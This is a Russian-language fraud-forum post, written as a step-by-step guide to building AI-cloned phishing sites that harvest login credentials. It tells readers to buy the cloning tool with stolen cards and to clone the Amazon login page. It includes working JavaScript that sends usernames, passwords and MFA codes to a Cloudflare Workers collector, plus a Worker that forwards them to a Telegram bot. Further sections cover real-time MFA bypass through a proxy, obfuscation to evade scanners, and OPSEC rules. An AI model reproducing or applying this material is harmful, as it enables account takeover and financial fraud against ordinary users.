ФАБРИКА ФИШИНГА: Руководство по AI-фишингу, React-клонированию и промышленному сбору учётных данных

Professor

Professional
Messages
1,769
Reaction score
1,740
Points
113

📑 СОДЕРЖАНИЕ​

  1. Введение: смерть традиционного фишинга
  2. Две фундаментальные проблемы: обфускация и расширяемость
  3. AI-революция: визуально-кодовый фишинг
  4. Арсенал клонирования: Orchids, Memma, Anima и Spiderman
  5. Пошаговое руководство: создание первой AI-фишинг-страницы
  6. Преимущество React: почему клиентский рендеринг побеждает сканеры
  7. Бэкенд: Cloudflare Workers, Telegram-боты и конвейеры учётных данных
  8. Прокси-метод: обход MFA в реальном времени с headless-браузерами
  9. Сборка и деплой: Vite, обфускация и Cloudflare Pages
  10. Продвинутые расширения: захват OTP, геотрекинг и перехват сессий
  11. Ограничения: что AI может и не может
  12. Будущее: GPT-6, поведенческое клонирование и растущий разрыв
  13. Обработка ошибок и устранение неполадок
  14. Анализ рисков и их минимизация
  15. Правила OPSEC для AI-фишинга
  16. Полный чек-лист
  17. Ключевые выводы

ГЛАВА 1: ВВЕДЕНИЕ — СМЕРТЬ ТРАДИЦИОННОГО ФИШИНГА​

Представь: 3 часа ночи, ты сидишь перед компьютером с красными глазами, пытаясь разобрать HTML той заманчивой банковской страницы, которую пытаешься клонировать. Ты занимаешься этим часами — вручную копируешь исходный код, скачиваешь ресурсы, исправляешь битые ссылки. Но как бы ты ни старался, страница просто не загружается. Шрифты кривые, изображения возвращают 403, а CSS всё ещё не работает как надо.

Наконец, после целой вечности отладки, всё готово. Ты загружаешь это на свой bulletproof-хостинг, запускаешь почтовую пушку и начинаешь материться.

И тут — БАМ!

В течение нескольких часов твой домен забанят, хостинг-провайдер заблокирует сайт, и вся работа уйдёт в никуда. Твоя красивая фишинг-страница умрёт. Твои мечты о лёгких деньгах рухнут.

Знакомо? Да, я так и думал.

Суть в том, что по мере усложнения инструментов обнаружения, твой подход должен становиться сложнее. Дни копирования HTML-кода и молитв богам фрода закончились.

Сегодня мы погружаемся в новое поколение фишинга — то, которое даёт максимальную расширяемость и обфускацию прямо из коробки. Фишеры, которые адаптируются на лету, имеют функции, недоступные ранее, и автоматически скрываются от назойливых сканеров безопасности.

Добро пожаловать в будущее. Поехали.

ГЛАВА 2: ДВЕ ФУНДАМЕНТАЛЬНЫЕ ПРОБЛЕМЫ — ОБФУСКАЦИЯ И РАСШИРЯЕМОСТЬ​

Прежде чем перейти к новым технологиям, давай вспомним, как большинство из вас создаёт фишинг-страницы, и почему это не работает.

2.1. Старый метод​

ШагДействиеИнструменты
1Выбор целиБанк, платёжный процессор, email-провайдер
2Клонирование страницыHTTrack, Save Page WE, Singlefile, Ctrl+S
3Исправление ресурсовРучная замена URL, скачивание ресурсов
4Настройка бэкендаPHP-скрипт (скопированный с HackForums 2015)
5ДеплойБесплатный хостинг, взломанный WordPress
6РаспространениеСпам, SMS, соцсети

2.2. Проблема №1: Обфускация (или её отсутствие)​

Вот забавный факт: прямо сейчас, пока ты читаешь это, тысячи ботов сканируют интернет в поисках фишинг-страниц. Эти цифровые ищейки вынюхивают HTML-код, совпадающий с известными паттернами: логотип PayPal здесь, кнопка «Войти» там — бам, ты помечен.

Почему им так легко? Серверный рендеринг.
Когда кто-то посещает твою фишинг-страницу, твой сервер отдаёт ему полный HTML. Каждый элемент, каждая строка, каждое подозрительное поле формы — всё в открытом тексте для парсинга ботами. Это как пытаться спрятать наркотики в прозрачном пластиковом пакете.

Компании по безопасности имеют огромные базы HTML-отпечатков легитимных сайтов. Когда твоя поддельная страница Bank of America выдаёт HTML, на 95% идентичный оригиналу, их алгоритмы загораются как рождественская ёлка. Твой домен попадает в чёрный список, а регистратор и хостинг автоматически уведомляются.

2.3. Проблема №2: Расширяемость (настоящий убийца)​

Здесь традиционный фишинг особенно показывает свой возраст. Допустим, ты хочешь вывести фишинг на новый уровень и сделать его асинхронным.

Что это значит? Вместо простого сбора данных и отправки сообщений, тебе нужно:
  1. Захватить логин/пароль жертвы
  2. Проверить их в реальном времени на настоящем сайте
  3. Когда срабатывает одноразовый пароль (OTP), динамически показать страницу запроса OTP
  4. Захватить OTP, пока жертва ещё на твоём сайте
  5. Получить прибыль с полным доступом к аккаунту

Звучит круто, правда? Удачи реализовать это со статичным HTML.

Тебе придётся реверс-инжинирить процесс аутентификации на сайте, извлечь и понять их JavaScript, перестроить стили для новой OTP-страницы и убедиться, что всё работает без сучка и задоринки.

ГЛАВА 3: AI-РЕВОЛЮЦИЯ — ВИЗУАЛЬНО-КОДОВЫЙ ФИШИНГ​

Теперь начинается интересное. Что если я скажу тебе, что есть способ автоматически генерировать полностью расширяемую кодовую базу из любого сайта? Код, изначально скрытый от сканеров, позволяющий легко добавлять сложные функции и делающий твои фишеры практически необнаружимыми для традиционных методов сканирования?

3.1. Как работает визуально-кодовый подход​

Вместо HTML-файла с битыми ресурсами, современные AI-инструменты используют визуально-кодовый конвейер:
  1. Визуальный анализ — AI анализирует скриншот или URL целевого сайта
  2. Структурное понимание — определяет компоненты (шапка, форма, подвал)
  3. Генерация кода — перестраивает с нуля как современное React-приложение
  4. Применение стилей — применяет Tailwind CSS и Shadcn UI
  5. Вывод — ты получаешь полностью функциональный React-проект

Это как если бы AI-разработчик перестраивал сайт для тебя, только этот разработчик не задаёт вопросов и работает бесплатно.

3.2. Модульный фронтенд-движок​

Согласно исследованию безопасности фишинг-кита Spiderman, ключевая инновация — это модульный фронтенд-движок + динамическая бэкенд-прокси-архитектура. Панель управления кита предоставляет:
ФункцияОписание
Библиотека шаблонов банков50+ скриншотов UI европейских банков, автоизвлечение CSS-стилей, шрифтов, позиций кнопок
Динамическое сопоставление полейАвтоопределение полей формы входа (username, password, otp) и генерация скриптов захвата
Помощник маскировки доменаРекомендует домены с высоким сходством и автоматически генерирует SSL-сертификаты через ACME/Let's Encrypt
Дашборд логов в реальном времениПоказывает захваченные учётные данные, геолокацию, тип устройства, экспорт CSV в один клик

«Это по сути SaaS-платформа для фишинг-сайтов», — отмечает эксперт по борьбе с фишингом Лу Ди. «Раньше создание фишинг-сайта занимало полдня. Теперь это быстрее, чем заказать еду.»

ГЛАВА 4: АРСЕНАЛ КЛОНИРОВАНИЯ​

4.1. Orchids.app​

Что это: Первый AI-конструктор приложений, который создаёт и разворачивает любое приложение, любой стек — веб, мобильные, Chrome-расширения, Slack-боты, AI-агенты.

Ключевые функции:
  • Визуальный анализ целевых сайтов
  • Генерация React-кодовой базы
  • Встроенный редактор VS Code
  • Использование существующих AI-подписок (ChatGPT, Claude, Gemini)

Цена: Бесплатный план; премиум для безлимитных клонов.

4.2. Memma​

Что это: Open-source CLI-инструмент визуально-кодового преобразования, конвертирующий сайты в React-компоненты.

Ключевые функции:
  • memma generate <source> — конвертирует URL или изображение в React-компоненты
  • TypeScript-компоненты React
  • Инлайн-стилизация Tailwind CSS
  • Опция создания Next.js-проекта
  • Поддержка локальных изображений

Установка:
Bash:
npm install -g memma
memma init
memma start
memma generate https://amazon.com/login

4.3. Anima​

Что это: API-first инструмент, превращающий Figma-дизайны или живые сайты в чистый, production-ready код.

Ключевые функции:
  • Website to Code (URL → React)
  • Только Tailwind CSS для сайтов
  • Только Shadcn UI для сайтов
  • Только TypeScript для сайтов

Пример SDK:
JavaScript:
const { generateCode } = require('@animaapp/anima-sdk');

await generateCode({
  source: { url: 'https://amazon.com/login' },
  settings: {
    framework: 'react',
    language: 'typescript',
    styling: 'tailwind',
    uiLibrary: 'shadcn'
  }
});

4.4. Фишинг-кит Spiderman​

Что это: Коммерческий фишинг-кит, продающийся в даркнете за $300-800/месяц.

Ключевые функции:
  • Zero-code, полный GUI, деплой в один клик
  • Библиотека шаблонов банков (50+ европейских банков)
  • Прокси-форвардинг в реальном времени для обхода MFA
  • Генерация страницы за 10 секунд
  • Поддержка 12 языков

Как это работает:
  1. Выбери целевой банк из GUI
  2. Выбери язык
  3. Введи фейковый домен
  4. Система генерирует фишинг-сайт за <10 секунд
  5. Прокси в реальном времени пересылает учётные данные настоящему банку
  6. Пользователь перенаправляется на страницу «техобслуживания»

ГЛАВА 5: ПОШАГОВОЕ РУКОВОДСТВО — СОЗДАНИЕ ПЕРВОЙ AI-ФИШИНГ-СТРАНИЦЫ​

Давай испачкаем руки и клонируем Amazon как профессиональные дегенераты, которыми мы являемся.

Шаг 1: Карди подписку Orchids.app​

Для начала тебе понадобится аккаунт Orchids.app. Хотя у них есть бесплатный план, тебе нужен премиум для безлимитных клонов и лучших AI-моделей. Запусти свой любимый кардинг-сетап и зарегистрируй подписку. Если ты не можешь позволить себе SaaS-подписку за $20/месяц, тебе нечего делать в фишинге.

Шаг 2: Привлеки цель​

Зайди на страницу входа Amazon. Сделай скриншот или сохрани URL — он понадобится для Orchids.app.

Шаг 3: Войны клонов​

  1. Перейди на orchids.app
  2. Вставь URL Amazon или загрузи скриншот
  3. Смотри, как AI творит магию

Через несколько секунд у тебя будет React-проект, почти идентичный странице входа Amazon.

Шаг 4: Выбери оружие​

Могут остаться артефакты, но у тебя есть два варианта тонкой настройки:
Вариант A: Скачай и используй AI-IDE
  • Скачай проект
  • Открой в Cursor или Windsurf
  • Используй естественный язык: «Сделай кнопку входа темнее» или «Исправь мобильную версию»

Вариант B: Используй встроенный редактор Orchids.app
  • Останься в Orchids.app
  • Используй функцию подсказок: «Совпадение с оранжевым цветом Amazon» или «Добавь логотип безопасности из оригинала»

Шаг 5: Быстрый бэкенд (тестирование)​

Настройка полноценного бэкенда описана в Главе 7. Пока используй webhook.site:
  1. Перейди на webhook.site
  2. Получи свой уникальный URL
  3. Попроси Orchid заменить action формы на этот URL

Это только для тестирования.

Шаг 6: Добавление продвинутых функций​

Хочешь добавить захват OTP? Просто покажи Orchids.app (или Cursor) скриншот OTP-страницы Amazon и скажи «Добавь это как новый компонент».

AI сгенерирует компонент, который автоматически унаследует все стили Amazon: цвета, шрифты, отступы. Он будет выглядеть нативно, потому что вся твоя кодовая база уже правильно тематизирована.

Шаг 7: Сборка и деплой​

Bash:
npm run build

Это создаст оптимизированную, обфусцированную production-сборку.

Для хостинга? Просто создай новый проект Cloudflare Pages, загрузи папку dist напрямую и смотри, как твоя фишинг-страница оживает.

Сгенерированные файлы — это минифицированный JavaScript. Никаких очевидных HTML-форм для сканеров. Только скомпилированный React-код, который может быть любым веб-приложением!

ГЛАВА 6: ПРЕИМУЩЕСТВО REACT — ПОЧЕМУ КЛИЕНТСКИЙ РЕНДЕРИНГ ПОБЕЖДАЕТ СКАНЕРЫ​

6.1. Как работает клиентский рендеринг​

Поскольку Orchids.app генерирует React-приложение, твоя фишинг-страница больше не рендерится как статичный HTML. Вместо этого:
ФункцияКак работает
Клиентский рендерингБраузер получает JavaScript, который динамически рендерит страницу
Компонентная архитектураФорма входа генерируется React-компонентами во время выполнения
Обфускация при сборкеVite-плагины для минификации, tree shaking, кастомной обфускации

6.2. Что видят сканеры​

Сканеры ищут:
HTML:
<form action="login">

Они ничего не найдут, потому что твоя форма генерируется на стороне клиента с JavaScript, который выглядит как алфавитный суп.
Что ищут сканерыЧто они находят
Статичные HTML-формыJavaScript-бандлы
Известные паттерныМинифицированный React-код
Ссылки на оригинальный доменОбфусцированные строки
Подозрительные поля формКомпоненты, генерируемые во время выполнения

6.3. Реальный пример​

В марте 2026 года фишинговая кампания использовала React-based SPA, размещённое на домене Cloudflare Workers, для имитации Dropbox Transfer. HTML фишинг-страницы был минимальным, а интерфейс динамически рендерился через bundled JavaScript-файл, содержащий React runtime и логику приложения.

Этот SPA-подход необычен для фишинг-китов, которые обычно используют статичный HTML, что делает анализ и обнаружение более сложными.

ГЛАВА 7: БЭКЕНД — CLOUDFLARE WORKERS, TELEGRAM-БОТЫ И КОНВЕЙЕРЫ УЧЁТНЫХ ДАННЫХ​

7.1. Инфраструктурный стек Cloudflare​

Согласно исследованию безопасности Cloudflare-хостинга AWS-фишинга, атакующие используют три бесплатных сервиса Cloudflare:
СервисРольФормат домена
Cloudflare PagesХостинг статичной фишинг-страницыxxx.pages.dev
Cloudflare WorkersПрокси-слой man-in-the-middlexxx.workers.dev
Cloudflare TunnelТуннелирование скрытого бэкендаtrycloudflare.com

7.2. Полная настройка инфраструктуры (5 минут)​

  1. Зарегистрируй анонимный аккаунт Cloudflare
  2. Включи Pages, Workers, R2 storage, Tunnel
  3. Скачай open-source фишинг-кит
  4. Загрузи статичные страницы в Pages
  5. Задеплой прокси-скрипт Workers
  6. Включи Tunnel для бэкенда
  7. Сгенерируй фишинг-ссылки

Никаких платежей, никакой верификации личности, 5 минут до запуска полной фишинг-инфраструктуры.

7.3. Логика прокси Workers​

Скрипт Workers действует как посредник:
JavaScript:
// JS-сниппет кражи учётных данных AWS-фишинг-страницы
const submitForm = document.getElementById("aws-login-form");
submitForm.addEventListener("submit", async function(e) {
  e.preventDefault();
  const user = document.getElementById("username").value;
  const pwd = document.getElementById("password").value;
  const mfa = document.getElementById("mfa-code").value;
  
  // Отправка данных через прокси Cloudflare Workers
  await fetch("https://aws-proxy-xxx.workers.dev/collect", {
    method: "POST",
    headers: {"Content-Type": "application/json"},
    body: JSON.stringify({
      aws_user: user,
      aws_pwd: pwd,
      mfa_token: mfa,
      device: navigator.userAgent,
      timestamp: new Date().getTime()
    })
  });
  
  // Перенаправление на настоящую консоль AWS для устранения подозрений
  window.location.href = "https://console.aws.amazon.com";
});

Ключевая логика обмана: После отправки учётных данных автоматически перенаправляй на настоящую консоль AWS. Жертва не воспримет никакой аномалии и не сохранит в памяти доступ к ненормальной странице, что значительно повышает успех атаки.

7.4. Интеграция Telegram-бота​

Для уведомлений о учётных данных в реальном времени используй Cloudflare Workers с Telegram Bot API:
JavaScript:
// Cloudflare Worker для уведомлений Telegram
addEventListener('fetch', event => {
  event.respondWith(handleRequest(event.request))
})

async function handleRequest(request) {
  const data = await request.json()
  
  await fetch(`https://api.telegram.org/bot${BOT_TOKEN}/sendMessage`, {
    method: 'POST',
    headers: {'Content-Type': 'application/json'},
    body: JSON.stringify({
      chat_id: CHAT_ID,
      text: `Новые учётные данные: ${JSON.stringify(data)}`
    })
  })
  
  return new Response('OK')
}

7.5. Альтернативная эксфильтрация: EmailJS​

В марте 2026 года кампания использовала EmailJS — легитимный API email-сервиса — для эксфильтрации учётных данных. Вместо отправки данных на контролируемую атакующим инфраструктуру, учётные данные отправлялись напрямую по email через клиентский JavaScript.

Это обходит традиционные методы сетевого обнаружения, потому что трафик идёт к легитимному сервису.

ГЛАВА 8: ПРОКСИ-МЕТОД — ОБХОД MFA В РЕАЛЬНОМ ВРЕМЕНИ​

8.1. Как работает Starkiller​

Новый фреймворк Starkiller использует другой подход. Он запускает headless Chrome внутри Docker-контейнера, загружает настоящий сайт бренда и действует как обратный прокси между целью и легитимным сайтом.

Получатели обслуживаются подлинным контентом страницы напрямую через инфраструктуру атакующего, гарантируя, что фишинг-страница никогда не устареет.

8.2. Объяснение обхода MFA​

Поскольку конечный пользователь фактически аутентифицируется на настоящем сайте через прокси, любые одноразовые коды или токены аутентификации, которые он отправляет, пересылаются легитимному сервису в реальном времени. Атакующий захватывает результирующие session cookies и токены, получая аутентифицированный доступ к аккаунту.

Когда атакующие ретранслируют весь процесс аутентификации в реальном времени, защиты MFA могут быть эффективно нейтрализованы, несмотря на то, что они функционируют точно как задумано.


8.3. Функции Starkiller​

ФункцияОписание
Мониторинг сессии в реальном времениLive-стрим экрана цели
Захват кейлоггераКаждое нажатие клавиши
Кража cookie/session tokenПрямой захват аккаунта
ГеотрекингМестоположение цели
Telegram-алертыАвтоматические уведомления
Аналитика кампанииСчётчики посещений, конверсии

ГЛАВА 9: СБОРКА И ДЕПЛОЙ — VITE, ОБФУСКАЦИЯ И CLOUDFLARE PAGES​

9.1. Процесс сборки​

Bash:
npm run build

Это создаёт:
  • Минифицированный JavaScript
  • Обфусцированный код
  • Оптимизированные ресурсы
  • Production-ready файлы

9.2. Продвинутая обфускация​

Для максимальной защиты исходников используй javascript-obfuscator с высокобезопасными параметрами:
Bash:
javascript-obfuscator input.js --output output.js \
  --self-defending \
  --string-array-encoding base64 \
  --string-array-threshold 0.75
ПараметрЭффект
--self-defendingПредотвращает запуск кода при вмешательстве
--string-array-encoding base64Скрывает чувствительные строки
--string-array-threshold 0.75Обфусцирует 75% всех строк

9.3. Деплой на Cloudflare Pages​

  1. Создай новый проект Cloudflare Pages
  2. Загрузи папку dist
  3. Настрой кастомный домен
  4. Включи SSL
  5. Используй Turnstile для фильтрации ботов

Почему Cloudflare?
  • Бесплатный тариф
  • Глобальный CDN
  • DDoS-защита
  • Workers для serverless-бэкенда

ГЛАВА 10: ПРОДВИНУТЫЕ РАСШИРЕНИЯ​

10.1. Захват OTP​

ШагДействие
1Покажи AI скриншот OTP-страницы
2Скажи «Добавь это как новый компонент»
3AI генерирует компонент с совпадающими стилями
4Подключи к бэкенду для захвата в реальном времени

10.2. Геотрекинг​

Фишинг-скрипт запрашивает Geoapify IP geolocation API для сбора географических метаданных жертвы, которые отправляются вместе с учётными данными атакующим.

10.3. Перехват сессий​

Когда Starkiller проксирует живые потоки аутентификации, он захватывает session cookies и токены. Они могут использоваться для:
  • Прямого захвата аккаунта
  • Латерального перемещения внутри организаций
  • Follow-on атак
  • Сбора email для дальнейшего фишинга

10.4. Сбор email​

Собранные email из скомпрометированных сессий могут обеспечить follow-on атаки, которые распространяются латерально по организации.

ГЛАВА 11: ОГРАНИЧЕНИЯ — ЧТО AI МОЖЕТ И НЕ МОЖЕТ​

Прежде чем ты убежишь, думая, что у тебя всё отлично с новым AI-фишинг-китом, позволь немного разочаровать тебя.

11.1. Что AI не сделает идеально​

ПроблемаЧастота
Нет интерактивных элементовЧасто
Неправильные цвета/отступыЧасто
Некорректный адаптивный дизайнИногда
Нет hover-состоянийЧасто
Нет анимацийЧасто

11.2. Как исправить​

Используй функцию подсказок Orchids.app для уточнения:
  • «Сделай кнопку входа того же оттенка красного, что и оригинал»
  • «Добавь hover-выпадающее меню»
  • «Исправь мобильную вёрстку, чтобы она была вертикальной»

11.3. Правило 80/20​

Думай об этом как о 80% пути, пройденных автоматически, с последними 20%, требующими твоей креативности.

Это всё ещё быстрее и надёжнее, чем копирование сложных страниц и возня с нуля, но не ожидай идеального клона 1:1 без некоторой работы.

11.4. Ограничения динамического контента​

Сайты, загружающие контент через JavaScript, могут не клонироваться полностью. AI-инструменты захватывают то, что видно при начальной загрузке страницы.

Страницы за логином: AI может получить доступ только к публичным страницам по умолчанию. Контент за аутентификацией не будет захвачен.

ГЛАВА 12: БУДУЩЕЕ — GPT-6, ПОВЕДЕНЧЕСКОЕ КЛОНИРОВАНИЕ И РАСТУЩИЙ РАЗРЫВ​

12.1. Что нас ждёт​

Но вот прекрасная часть: это только стартовая линия, а не финишная. AI развивается с головокружительной скоростью.
Временная шкалаВозможность
Сегодня5-10 итераций для идеального клона
6 месяцев2-3 итерации
1 годАвтоматическое совершенство
2 годаПолное поведенческое клонирование

12.2. Грядущая революция​

Мы быстро приближаемся к будущему, где ты можешь вставить URL, нажать Enter и получить пиксель-в-пиксель клон, неотличимый от оригинала. Каждое микровзаимодействие, каждый hover-эффект, каждая адаптивная точка — всё захвачено и воссоздано безупречно в одной командной строке.

AI поймёт не только то, как сайт выглядит, но и то, как он ведёт себя.

12.3. GPT-6 и beyond​

Думаешь, GPT-4 умный? Подожди, пока GPT-6 сможет анализировать весь пользовательский поток сайта, понимать его логику аутентификации и воссоздавать не только визуальный дизайн, но и весь пользовательский опыт.

Мы говорим об AI, который будет реверс-инжинирить сложные веб-приложения и создавать production-ready фишинг-платформы, которые даже оригинальные разработчики не смогут отличить.

12.4. Растущий разрыв​

Это руководство представляет первую волну по-настоящему интеллектуальных фишинг-инструментов. К тому времени, как большинство новичков разберутся, как правильно использовать Orchids.app, следующее поколение AI сделает сегодняшние инструменты похожими на наскальные рисунки.

Оставайся впереди кривой, потому что этот технологический разрыв будет только расти. Ранние последователи будут пировать, пока динозавры всё ещё борются с битыми копиями HTML.

12.5. Влияние Spiderman​

Кит Spiderman знаменует переход фишинга от «ремесленной мастерской» к «промышленному конвейеру». Обычным преступникам не нужно знать HTML, JavaScript или даже арендовать сервер — просто заплати кредиткой, чтобы запустить трансграничное финансовое мошенничество.

12.6. Влияние Starkiller​

Низкий технический барьер Starkiller делает его особенно опасным для защитников. Панель point-and-click не требует знаний обратных прокси или сертификатов, давая низкоквалифицированным атакующим фишинг-возможности корпоративного уровня.

ГЛАВА 13: ОБРАБОТКА ОШИБОК И УСТРАНЕНИЕ НЕПОЛАДОК​

13.1. Ошибка: AI-клон выглядит неправильно​

Причины: Сложная структура страницы, динамический контент, ограничения AI
Решение: Используй функцию подсказок, ручное редактирование, несколько итераций

13.2. Ошибка: Форма не отправляется​

Причины: Неправильный URL action, проблемы CORS, ошибки JavaScript
Решение: Проверь URL action, настрой CORS, отладь JavaScript

13.3. Ошибка: Домен забанен​

Причины: Обнаружен сканерами, сообщён жертвами, в чёрном списке
Решение: Новый домен, лучшая обфускация, защита Cloudflare

13.4. Ошибка: OTP не захватывается​

Причины: Бэкенд не подключён, неправильная логика потока, проблемы тайминга
Решение: Проверь бэкенд, пересмотри поток, настрой тайминг

ГЛАВА 14: АНАЛИЗ РИСКОВ И ИХ МИНИМИЗАЦИЯ​

14.1. Риски​

РискВероятностьМинимизация
Бан доменаВысокаяРотация
ОбнаружениеСредняяОбфускация
Компрометация бэкендаСредняяШифрование
Юридические проблемыСредняяVPN, OPSEC

14.2. Методы обнаружения для обхода​

Согласно CGI AntiPhish, системы обнаружения анализируют:
СлойЧто анализируется
ВизуальныйФронтальная страница и визуальные элементы сайта
ИсходныйХост, расположение, исходный код
МетаСертификат и его домены

Защита: Клиентский рендеринг побеждает визуальный анализ, обфускация побеждает анализ исходников, Cloudflare побеждает мета-анализ.

ГЛАВА 15: ПРАВИЛА OPSEC ДЛЯ AI-ФИШИНГА​

  1. Всегда используй VPN
  2. Никогда не используй реальную личность
  3. Ротируй домены
  4. Шифруй данные
  5. Используй крипто-платежи
  6. Никогда не храни улики
  7. Используй Cloudflare для анонимности
  8. Разделяй инфраструктуру для каждой кампании

ГЛАВА 16: ПОЛНЫЙ ЧЕК-ЛИСТ​

Перед началом:​

  • □ Аккаунт Orchids.app (премиум)
  • □ Кардинг-сетап для подписки
  • □ URL/скриншот цели
  • □ AI-IDE (Cursor/Windsurf)
  • □ Аккаунт Cloudflare
  • □ VPN активен

Клонирование:​

  • □ Цель проанализирована
  • □ Клон сгенерирован
  • □ Артефакты исправлены
  • □ Функции добавлены
  • □ Бэкенд подключён

Деплой:​

  • □ Сборка завершена
  • □ Обфускация применена
  • □ Cloudflare Pages настроен
  • □ Домен сконфигурирован
  • □ SSL включён
  • □ Turnstile включён

После деплоя:​

  • □ Мониторинг активен
  • □ Telegram-бот настроен
  • □ Учётные данные поступают
  • □ Ротация доменов готова
  • □ Бэкапы на месте
  • □ OPSEC соблюдён

ГЛАВА 17: КЛЮЧЕВЫЕ ВЫВОДЫ​

Фишинг развивается, нравится тебе это или нет. Старые методы устаревают.

Это твой призыв к действию. Инструменты существуют, методы проверены, и единственное, что стоит между тобой и фишингом нового уровня — твоя готовность изучить основы React.

Ключевые выводы:​

  1. Традиционный фишинг мёртв — слишком медленный, слишком обнаружимый
  2. AI-клонирование — это будущее — Orchids, Memma, Anima, Spiderman
  3. React-кодовая база = расширяемость — добавь любую функцию
  4. Клиентский рендеринг = обфускация — сканеры ничего не видят
  5. Cloudflare Pages = деплой — быстро, бесплатно, защищено
  6. Прокси-метод = обход MFA — подход Starkiller
  7. Разрыв растёт — ранние последователи побеждают

Финальное слово:​

Большинство продолжит использовать свои битые HTML-коды. Но для тех, кто готов эволюционировать и принять новые технологии, награды будут там.

Помни: в этой игре ты либо инновируешь, либо проиграешь.

Будь осторожен, продолжай учиться и, ради всего святого, используй VPN.

Удачи, брат. Если что — задавай вопросы.
 
Top